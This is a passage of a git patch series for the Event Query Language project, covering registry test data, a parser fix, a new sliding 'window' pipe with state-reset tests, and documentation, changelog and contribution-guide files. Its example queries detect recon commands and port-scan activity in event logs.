"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574191360000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574191520000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 5824, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", + "registry_value": "NewClientID", + "timestamp": 131883574191990000, + "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", + "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", + "timestamp": 131883574191990000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_value": "VFUProvider", + "timestamp": 131883574200270000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", + "registry_value": "StartTime", + "timestamp": 131883574200270000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574216680000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883574216680000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883574216680000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574216830000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574216830000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574216830000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000B053C", + "registry_value": "W32:00000000000B053C", + "timestamp": 131883574217619984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000B053C", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000B053C\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574217619984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + } +] \ No newline at end of file From 84b689e03f479fa4bbd2a7a524e15b592b49bcca Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Fri, 18 Oct 2019 15:52:11 +0100 Subject: [PATCH 05/13] Small fix in parser for returning invalid time unit. --- eql/parser.py | 2 +- tests/test_parser.py | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/eql/parser.py b/eql/parser.py index d7540d8..fc908a8 100644 --- a/eql/parser.py +++ b/eql/parser.py @@ -347,7 +347,7 @@ def walk__time_range(self, node): if name.startswith(unit.rstrip('s') or 's'): return ast.TimeRange(datetime.timedelta(seconds=val * interval)), types.literal(types.NUMBER) - raise self._error(node.unit, "Unknown time unit") + raise self._error(node, "Unknown time unit") def walk__check_parentheses(self, node): """Check that parentheses are matching.""" diff --git a/tests/test_parser.py b/tests/test_parser.py index 202ab9f..0ba1544 100644 --- a/tests/test_parser.py +++ b/tests/test_parser.py @@ -276,6 +276,7 @@ def test_invalid_queries(self): 'sequence [process where pid == pid]', 'sequence [process where pid == pid] []', 'sequence with maxspan=false [process where true] [process where true]', + 'sequence with maxspan=10g [process where true] [process where true]', 'sequence with badparam=100 [process where true] [process where true]', # check that the same number of BYs are in every subquery 'sequence [file where true] [process where true] by field1', From b433376a7ffe7505a187a78dae5438bee562076a Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Fri, 18 Oct 2019 22:46:29 +0100 Subject: [PATCH 06/13] Updated window_pipe for EQL 0.7.0. Rolled back host_key removal. --- eql/engine.py | 100 +++++++++++++++++++++++++++++------- eql/etc/eql.ebnf | 1 + eql/pipes.py | 27 +++++++++- tests/test_parser.py | 3 ++ tests/test_python_engine.py | 41 +++++++++++++++ 5 files changed, 153 insertions(+), 19 deletions(-) diff --git a/eql/engine.py b/eql/engine.py index 79ab597..b89ccca 100644 --- a/eql/engine.py +++ b/eql/engine.py @@ -460,20 +460,32 @@ def _convert_count_pipe(self, node, next_pipe): # type: (CountPipe, callable) - if len(node.arguments) == 0: # Counting only the total summary = {'key': 'totals', 'count': 0} - hosts = set() + + # mutable scoped variable + hosts = [set()] def count_total_callback(events): if events is PIPE_EOF: - if len(hosts): - summary['total_hosts'] = len(hosts) - summary['hosts'] = list(sorted(hosts)) + # immutable version of summary + event = summary.copy() + + if len(hosts[0]): + event['total_hosts'] = len(hosts[0]) + event['hosts'] = list(sorted(hosts[0])) - next_pipe([Event(EVENT_TYPE_GENERIC, 0, summary)]) + next_pipe([Event(EVENT_TYPE_GENERIC, 0, event)]) next_pipe(PIPE_EOF) + + # reset state + summary['count'] = 0 + if len(hosts[0]): + del summary['hosts'] + del summary['total_hosts'] + hosts[0] = set() else: summary['count'] += 1 if host_key in events[0].data: - hosts.add(events[0].data[host_key]) + hosts[0].add(events[0].data[host_key]) return count_total_callback @@ -503,6 +515,9 @@ def count_tuple_callback(events): # type: (list[Event]) -> None details['percent'] = float(details['count']) / total next_pipe([Event(EVENT_TYPE_GENERIC, 0, details)]) next_pipe(PIPE_EOF) + + # reset state + count_table.clear() else: key = get_key(events) insensitive_key = remove_case(key) @@ -526,18 +541,20 @@ def filter_callback(events): # type: (list[Event]) -> None return filter_callback def _convert_head_pipe(self, node, next_pipe): # type: (HeadPipe, callable) -> callable - totals = [0] # has to be mutable because of python scoping + output_buffer = [] max_count = node.count def head_callback(events): - if totals[0] < max_count: - if events is PIPE_EOF: - next_pipe(PIPE_EOF) - else: - totals[0] += 1 - next_pipe(events) - if totals[0] == max_count: - next_pipe(PIPE_EOF) + if events is PIPE_EOF: + for output in output_buffer: + next_pipe(output) + next_pipe(PIPE_EOF) + + # reset state + output_buffer.clear() + else: + if len(output_buffer) < max_count: + output_buffer.append(events) return head_callback @@ -549,6 +566,9 @@ def tail_callback(events): for output in output_buffer: next_pipe(output) next_pipe(PIPE_EOF) + + # reset state + output_buffer.clear() else: output_buffer.append(events) @@ -569,6 +589,9 @@ def get_converted_key(buffer_events): for output in output_buffer: next_pipe(output) next_pipe(PIPE_EOF) + + # reset state + output_buffer.clear() else: output_buffer.append(events) @@ -581,6 +604,9 @@ def _convert_unique_pipe(self, node, next_pipe): # type: (UniquePipe, callable) def unique_callback(events): if events is PIPE_EOF: next_pipe(PIPE_EOF) + + # reset state + seen.clear() else: key = get_unique_key(events) if key not in seen: @@ -589,6 +615,32 @@ def unique_callback(events): return unique_callback + def _convert_window_pipe(self, node, next_pipe): # type: (WindowPipe) -> callable + """Aggregate events over a sliding window using a buffer.""" + window_buf = deque() # tuple of (timestamp, events) + timespan = self.convert(node.timespan) + + def time_window_callback(events): # type: (list[Event]) -> None + if events is PIPE_EOF: + next_pipe(PIPE_EOF) + + # reset state + window_buf.clear() + else: + minimum_start = events[0].time - timespan + + # Remove any events that no longer sit within the time window + while len(window_buf) > 0 and window_buf[0][0] < minimum_start: + window_buf.popleft() + + window_buf.append((events[0].time, events)) + + for result in window_buf: + next_pipe(result[1]) + next_pipe(PIPE_EOF) + + return time_window_callback + def _convert_unique_count_pipe(self, node, next_pipe): # type: (CountPipe) -> callable """Aggregate counts coming into the pipe.""" host_key = self.host_key @@ -610,6 +662,8 @@ def count_unique_callback(events): # type: (list[Event]) -> None next_pipe(result) next_pipe(PIPE_EOF) + # reset state + results.clear() else: # Create a copy of these, because they can be modified events = [events[0].copy()] + events[1:] @@ -645,12 +699,19 @@ def _reduce_count_pipe(self, node, next_pipe): # type: (CountPipe) -> callable def count_total_aggregates(events): # type: (list[Event]) -> None if events is PIPE_EOF: hosts = result.pop('hosts') # type: set + + # immutable version of result + event = result.copy() if len(hosts) > 0: - result['hosts'] = list(sorted(hosts)) - result['total_hosts'] = len(hosts) + event['hosts'] = list(sorted(hosts)) + event['total_hosts'] = len(hosts) - next_pipe([Event(EVENT_TYPE_GENERIC, 0, result)]) + next_pipe([Event(EVENT_TYPE_GENERIC, 0, event)]) next_pipe(PIPE_EOF) + + # reset state + result['count'] = 0 + result['hosts'] = set() else: piece = events[0].data result['count'] += piece['count'] @@ -681,6 +742,9 @@ def count_tuple_callback(events): # type: (list[Event]) -> None result['percent'] = float(result['count']) / total next_pipe([Event(EVENT_TYPE_GENERIC, 0, result)]) next_pipe(PIPE_EOF) + + # reset state + results.clear() else: piece = events[0].data key = events[0].data['key'] diff --git a/eql/etc/eql.ebnf b/eql/etc/eql.ebnf index c96404a..c3186d1 100644 --- a/eql/etc/eql.ebnf +++ b/eql/etc/eql.ebnf @@ -174,6 +174,7 @@ function_call::FunctionCall atom = + | time_unit | literal | field ; diff --git a/eql/pipes.py b/eql/pipes.py index f35ba50..529d601 100644 --- a/eql/pipes.py +++ b/eql/pipes.py @@ -1,5 +1,5 @@ """EQL Pipes.""" -from .ast import PipeCommand +from .ast import PipeCommand, TimeRange from .schema import Schema, EVENT_TYPE_GENERIC from .types import dynamic, NUMBER, literal, PRIMITIVES, EXPRESSION, get_type from .utils import is_string @@ -14,6 +14,7 @@ "CountPipe", "FilterPipe", "UniqueCountPipe", + "WindowPipe" ) @@ -152,3 +153,27 @@ class FilterPipe(PipeCommand): def expression(self): """Get the filter expression.""" return self.arguments[0] + + +@PipeCommand.register('window') +class WindowPipe(PipeCommand): + """Maintains a time window buffer for streaming events.""" + + argument_types = [literal(NUMBER)] + + minimum_args = 1 + maximum_args = 1 + + @property + def timespan(self): + """Get timespan as a TimeRange object.""" + return TimeRange.convert(self.arguments[0]) + + @classmethod + def validate(cls, arguments, type_hints=None): + """After performing type checks, validate that the timespan is greater than zero.""" + index, arguments, type_hints = super(WindowPipe, cls).validate(arguments, type_hints) + ts = cls(arguments).timespan + if index is None and (ts is None or ts.delta.total_seconds() <= 0): + index = 0 + return index, arguments, type_hints diff --git a/tests/test_parser.py b/tests/test_parser.py index 0ba1544..267eff9 100644 --- a/tests/test_parser.py +++ b/tests/test_parser.py @@ -196,6 +196,7 @@ def test_valid_queries(self): 'any where true | unique a b c | sort a b c | count', 'any where true | unique a, b, c | sort a b c | count', 'any where true | unique a, b, c | sort a,b,c | count', + 'any where true | window 5s | unique a, b | unique_count a | filter count > 5', 'file where child of [registry where true]', 'file where event of [registry where true]', 'file where event of [registry where true]', @@ -273,6 +274,8 @@ def test_invalid_queries(self): 'process where process_name == "abc.exe" | head abc', 'process where process_name == "abc.exe" | head abc()', 'process where process_name == "abc.exe" | head abc(def, ghi)', + 'process where process_name == "abc.exe" | window abc', + 'process where process_name == "abc.exe" | window 10g', 'sequence [process where pid == pid]', 'sequence [process where pid == pid] []', 'sequence with maxspan=false [process where true] [process where true]', diff --git a/tests/test_python_engine.py b/tests/test_python_engine.py index 9fe0425..c59ba53 100644 --- a/tests/test_python_engine.py +++ b/tests/test_python_engine.py @@ -518,3 +518,44 @@ def test_mutli_line_functions(self): self.assertTrue(Wildcard.run(source, "this*is*comment")) self.assertTrue(Wildcard.run(source, "t*a*c*")) self.assertFalse(Wildcard.run(source, "MiSsInG")) + + def test_pipes_reset_state(self): + """Test that the pipes are clearing their state after receiving PIPE_EOF""" + events = self.get_events() + + queries = [ + 'process where true | unique opcode', + 'process where true | unique_count opcode', + 'process where true | unique_count', + 'process where true | count', + 'process where true | count opcode', + 'process where true | head 1', + 'process where true | tail', + 'process where true | sort opcode', + 'process where true | window 10s', + 'process where true | window 5m | head 1', + ] + + for query in queries: + engine = PythonEngine() + + results = [] # type: list[Event] + engine.add_output_hook(results.append) + engine.add_queries([parse_query(query)]) + + engine.stream_events(events) + engine.finalize() + expected_len = len(results) + + results.clear() + + engine.stream_events(events) + engine.finalize() + actual_len = len(results) + + self.assertEquals( + expected_len, + actual_len, + f"Expected results to be same when streaming events multiple times {query}" + ) + From 5d394c791ed8d063a24bd48a9f1dd8de206954a7 Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Fri, 18 Oct 2019 23:59:58 +0100 Subject: [PATCH 07/13] Updated the documentation and test cases. --- docs/query-guide/pipes.rst | 27 +++++++++++++++++++++++++++ eql/etc/test_queries.toml | 22 ++++++++++++++++++++++ 2 files changed, 49 insertions(+) diff --git a/docs/query-guide/pipes.rst b/docs/query-guide/pipes.rst index 0df657a..c664a7c 100644 --- a/docs/query-guide/pipes.rst +++ b/docs/query-guide/pipes.rst @@ -124,3 +124,30 @@ Get the top five network connections that transmitted the most data | sort total_out_bytes | tail 5 +``window`` +--------- +The ``window`` pipe will buffer events based on the timespan specify, which allows other pipes to function on a sliding +window. This allows pipes to function when streaming data continuously. + +Find suspicious recon commands that were executed within a 5 minute window + .. code-block:: eql + + process where process_name in ("whoami.exe", "netstat.exe", "hostname.exe", "net.exe", "sc.exe", "systeminfo.exe") + | window 5m + | unique process_name + | unique_count + | filter count >= 3 + +Find processes that have network connections to a single host with over 100 unique ports within a 10 second window + .. code-block:: eql + + network where destination_address in ("10.*", "172.*", "192.*") + | window 10s + | unique_count process_name, destination_port + | filter count >= 100 + +.. note:: + + The window pipe will emit all events within the window buffer from the first event, meaning events will appear like + so: [[1], [1,2], [1,2,3], ...]. Therefore, it is recommended to use a combination of ``unique_count`` and + ``filter`` to only show events over a certain threshold. diff --git a/eql/etc/test_queries.toml b/eql/etc/test_queries.toml index fd17691..833528a 100644 --- a/eql/etc/test_queries.toml +++ b/eql/etc/test_queries.toml @@ -1127,3 +1127,25 @@ expected_event_ids = [57] query = ''' registry where arrayContains(bytes_written_string_list, "ross", "en-US") ''' + +[queries.q169] +expected_event_ids = [11, 50] +description = "test window pipe" +query = ''' +process where subtype == "create" | +window 5m | +unique parent_process_name, process_name | +unique_count parent_process_name | +filter count == 5 +''' + +[queries.q170] +expected_event_ids = [55] +description = "test window pipe with descendant" +query = ''' +file where event_subtype_full == "file_create_event" + and descendant of [process where process_name == "cmd.exe"] | + window 5m | + unique_count process_name | + filter count == 5 +''' From 6f24caf334b051cf25ba93d49b98cd07bc91c359 Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Sat, 19 Oct 2019 00:02:02 +0100 Subject: [PATCH 08/13] # Conflicts: # docs/query-guide/pipes.rst # eql/ast.py # eql/engine.py # eql/parser.py # setup.cfg # tests/test_data.json # tests/test_eql.py # tests/test_python_engine.py --- .github/ISSUE_TEMPLATE/bug_report.md | 22 + .github/ISSUE_TEMPLATE/feature_request.md | 12 + .github/PULL_REQUEST_TEMPLATE.md | 6 + .gitignore | 3 + CHANGELOG.md | 67 + CONTRIBUTING.md | 59 + Makefile | 73 +- README.md | 14 +- docs/_static/example.json | 65 +- docs/api/ast.rst | 21 +- docs/cli.rst | 37 +- docs/conf.py | 62 +- docs/index.rst | 6 +- docs/licenses.rst | 7 +- docs/query-guide/basic-syntax.rst | 16 +- docs/query-guide/functions.rst | 17 +- docs/query-guide/implementation.rst | 9 +- docs/query-guide/pipes.rst | 24 +- docs/resources.rst | 32 +- eql/__init__.py | 123 +- eql/ast.py | 490 +- eql/{engines => }/build.py | 15 +- eql/{engines/native.py => engine.py} | 495 +- eql/engines/__init__.py | 11 - eql/errors.py | 44 +- eql/etc/eql.ebnf | 47 +- eql/etc/schema.json | 11 - eql/etc/test_data.json | 2080 + eql/etc/test_queries.toml | 1151 + eql/events.py | 43 + eql/functions.py | 452 +- eql/highlighters.py | 68 + eql/loader.py | 6 +- eql/main.py | 90 +- eql/parser.py | 990 +- eql/pipes.py | 179 + eql/schema.py | 318 +- eql/shell.py | 748 + eql/signatures.py | 37 + eql/table.py | 286 + eql/tests/__init__.py | 9 + {tests => eql/tests}/base.py | 71 +- eql/{engines/base.py => transpilers.py} | 113 +- eql/types.py | 213 + eql/utils.py | 174 +- eql/walkers.py | 238 + requirements.txt | 3 +- requirements_test.txt | 10 +- setup.cfg | 5 +- setup.py | 56 +- tests/test_ast.py | 95 + tests/test_cli.py | 97 +- tests/test_data.json | 159600 ------------------- tests/test_eql.py | 697 - tests/test_optimizations.py | 168 + tests/test_parser.py | 364 + tests/test_preprocessor.py | 229 + tests/test_python_engine.py | 216 +- tests/test_queries.json | 1 - tests/test_schema.py | 231 + tests/test_type_system.py | 117 + tests/test_utils.py | 101 + 62 files changed, 9427 insertions(+), 161617 deletions(-) create mode 100644 .github/ISSUE_TEMPLATE/bug_report.md create mode 100644 .github/ISSUE_TEMPLATE/feature_request.md create mode 100644 .github/PULL_REQUEST_TEMPLATE.md create mode 100644 CHANGELOG.md create mode 100644 CONTRIBUTING.md rename eql/{engines => }/build.py (91%) rename eql/{engines/native.py => engine.py} (79%) delete mode 100644 eql/engines/__init__.py delete mode 100644 eql/etc/schema.json create mode 100644 eql/etc/test_data.json create mode 100644 eql/etc/test_queries.toml create mode 100644 eql/events.py create mode 100644 eql/highlighters.py create mode 100644 eql/pipes.py create mode 100644 eql/shell.py create mode 100644 eql/signatures.py create mode 100644 eql/table.py create mode 100644 eql/tests/__init__.py rename {tests => eql/tests}/base.py (50%) rename eql/{engines/base.py => transpilers.py} (64%) create mode 100644 eql/types.py create mode 100644 eql/walkers.py create mode 100644 tests/test_ast.py delete mode 100644 tests/test_data.json delete mode 100644 tests/test_eql.py create mode 100644 tests/test_optimizations.py create mode 100644 tests/test_parser.py create mode 100644 tests/test_preprocessor.py delete mode 100644 tests/test_queries.json create mode 100644 tests/test_schema.py create mode 100644 tests/test_type_system.py diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md new file mode 100644 index 0000000..4b34728 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/bug_report.md @@ -0,0 +1,22 @@ +--- +name: Bug report +about: File a bug +labels: bug + +--- + +### Describe the bug +A clear and concise description of what the bug is. + +#### To Reproduce +Steps to reproduce the behavior: +1. Go to '...' +2. Click on '....' +3. Scroll down to '....' +4. See error + +#### Expected behavior +A clear and concise description of what you expected to happen. + +#### Screenshots +If applicable, add screenshots to help explain your problem. diff --git a/.github/ISSUE_TEMPLATE/feature_request.md b/.github/ISSUE_TEMPLATE/feature_request.md new file mode 100644 index 0000000..0d29dd7 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/feature_request.md @@ -0,0 +1,12 @@ +--- +name: Feature Request +about: Suggest changes to syntax, functions, pipes, or the API +labels: feature-request + +--- + +## New Feature Description +* *Are you interesting in a new function, e.g. arrayContains, startsWith, wildcard?* +* *Are you proposing grammar or parser changes?* +* *What features do you want to add to the CLI?* +* *Are there changes to the evaluation engine?* diff --git a/.github/PULL_REQUEST_TEMPLATE.md b/.github/PULL_REQUEST_TEMPLATE.md new file mode 100644 index 0000000..e898b96 --- /dev/null +++ b/.github/PULL_REQUEST_TEMPLATE.md @@ -0,0 +1,6 @@ + + +## Issues + +## Details +*Describe details about your requested changes* diff --git a/.gitignore b/.gitignore index dfc995a..2ef397a 100644 --- a/.gitignore +++ b/.gitignore @@ -1,7 +1,10 @@ +/eql/_parsergen.py + # PyCharm junit.xml /.idea/ + # Visual Studio Code /.vscode diff --git a/CHANGELOG.md b/CHANGELOG.md new file mode 100644 index 0000000..a5a1acc --- /dev/null +++ b/CHANGELOG.md @@ -0,0 +1,67 @@ +# Event Query Language - Changelog +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/). + +## Version 0.7 +_Released 2019-07-24_ + +### Added +* Badges to README (PyPi, Twitter, ReadTheDocs, Gitter) +* Multiple values within `arrayContains()` function +* `arrayCount` function for counting the number of matches in an array +* Interactive shell with tables +* Validation system that matches types across schema and comparisons +* `SignatureMixin` class used to validate input and output arguments to functions, and pipes +* Better error messages with multiple carets +* Base class for all EQL errors +* Test data, queries, and the expected output for unit tests +* Signature base class +* Helper `Walker` classes with better methods and context for AST traversal +* `ParserConfig` class with context manager that toggles thread-specific parser settings +* Additional imports to the root `eql` module +* Autogenerated parser with `make parser` included in python module +* `is_stateful` function to `eql.utils` to determine if a parsed query is stateful +* `match_kv` function to `eql.utils` to autogenerate an AST from a dictionary of fields -> value(s) + +### Changed +* Rearranged imports, `eql.engines.native` is now `eql.engine` +* Using walker methods instead of NodeMethods to integrate with engine +* Moved function call evaluation to custom classes in `eql.functions` +* Moved highlighter from sphinx document generation to `eql.highlighters` +* Moved PipeCommand subclasses to `eql.pipes` +* Exception class names to all have **Eql** prefix +* Moved unit tests to `eql.tests` module and rearranged test +* Implementation of `by` for sequences, joins and pipes to perform case-insensitive checks + +### Fixed +* Bug where wildcards were only matched on the first line of text in a field + +### Removed +* Default EQL schema. Now accepts all input and event types by default + +## Version 0.6.3 +_Released 2019-04-17_ + +### Added +* @itsnotapt Made `pid` and `ppid` fields configurable + +## Version 0.6.2 +_Released 2018-12-13_ + +### Fixed +* Broken implementation of streaming .jsonl files + +## Version 0.6.1 +_Released 2019-12-05_ + +## Added +* Support for gzipped files + +## Version 0.6 +_Initial Release 2018-11_30_ + +### Added (Initial Features) +* EQL parser with Tatsu +* Evaluation engine in `eql.engines.native` +* Macro and constants for preprocessors +* `eql` CLI command for querying against a JSON file +* Security schema by default (`file`, `network`, `process`, etc.) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md new file mode 100644 index 0000000..1319f31 --- /dev/null +++ b/CONTRIBUTING.md @@ -0,0 +1,59 @@ +# EQL Contribution Guide +Welcome to the Event Query Language (EQL) contribution guide and thank you for expressing an interest in contributing to EQL! + +As a quick refresher, the Event Query Language (EQL) was built by Endgame to express relationships between events. It is data source and platform agnostic, includes the ability to ask stateful questions, and enables sifting and stacking of data with unix-like pipes. + +The EQL community consists of two main components +* This repository, which houses the underlying language and evaluation engine +* An [Analytics Library](https://eqllib.readthedocs.io/), which contains detections and hunting strategies. + +Contributions to extend core capabilities of the language are directed to [``eql``](https://github.com/endgameinc/eql). For new detections, hunts, data sources, or knowledge sharing, please read the guidelines below before contributing. + +# Table of Contents +1. [Contribution Process](#contribution-process) +2. [Ways to Contribute](#ways-to-contribute) +3. [Resources](#resources) +4. [Licenses](#licenses) + +## Contribution Process +Contributing to EQL is a simple five-step process facilitated by Git: + +1. Create an [issue](https://github.com/endgameinc/eqllib/issues) to track and discuss the work +2. Create a [branch](https://help.github.com/en/articles/about-branches) +3. Submit a [pull request](https://help.github.com/en/articles/about-pull-requests) +4. Update according to the code review +5. [Merge](https://help.github.com/en/articles/merging-a-pull-request) after approval. + +### Additional Notes +* If you are accustomed to git, then great! If you aren't, don't fear, the command line tools are easy to use, but GitHub also has a straightforward process within your web browser to create branches and subsequent merging +* Use the Issues and PR templates! Git [Issues](https://github.com/endgameinc/eql/issues) are a great place to collaborate, discuss, or just track a request before development begins. +* There is plenty of literature and resources out there to help you. A great place to start is [GitHub guides](https://guides.github.com/). + +## Ways to contribute + +### Bug Fixes +Bug fixes are a natural area to contribute. We only ask that you please use the [bug report issue](https://github.com/endgameinc/eql/issues) to track the bug. Please elaborate on how to reproduce the bug and what behavior you would have expected. Compatibility is a priority for EQL, so be sure to capture information about your operating system and version of python. + +### Language or Engine Changes +For any changes within the language or the evaluation engine, propose your changes in a *Feature Request* issue to start a discussion. For new functionality function, be mindful of handling different edge cases, acceptable input, etc. We are happy to collaborate on such topics and encourage you to share ideas. + +Some types of core development include: +* Syntax changes: This can be an entirely new construct ranging from high level constructs (e.g. sequence, join), to smaller changes (e.g. adding binary operators). +* Pipes: pipes usually can be added without needing to make syntax changes. Some pipes may stream output while processing, and others track state and only output when all input is finished (e.g. count). +* Functions: functions can be easily extended without needing to recommend changes to the syntax +* API: You may also want to add new APIs, utility functions, etc. like `is_stateful` + +Anyone is encouraged to make a PR for open issues that have a clear path forward. When making changes, be sure to +* Link back to the issue "Resolves #100" +* Include unit tests in the relevant tests/ folder. +* Include end-to-end tests by updating the test [data](eql/etc/test_data.json) and [queries](eql/etc/test_queries.toml). These are used as the gold standard of expected behavior, and the queries should have a list of the serial_event_id of the events, in the expected order. + +### CLI +Finally, the CLI is an area we are always looking to expand. This may include new input file types, new processing features, new tables, etc. Some shell functionality, like tab completions ANSI coloring, and history often varies across different operating systems. If possible, please test new functionality across a few different operating systems if you have access, and Python 2.7 and 3.6+. If you find any unusual behavior in the shell related to compatibility, please let us know in an issue. + +## Resources +See the [resources page](https://eql.readthedocs.io/en/latest/resources.html) on ReadTheDocs for a full list of resources + + +## Licenses +The Event Query Language is licensed under [AGPL](LICENSE) diff --git a/Makefile b/Makefile index 460621d..2a7c415 100644 --- a/Makefile 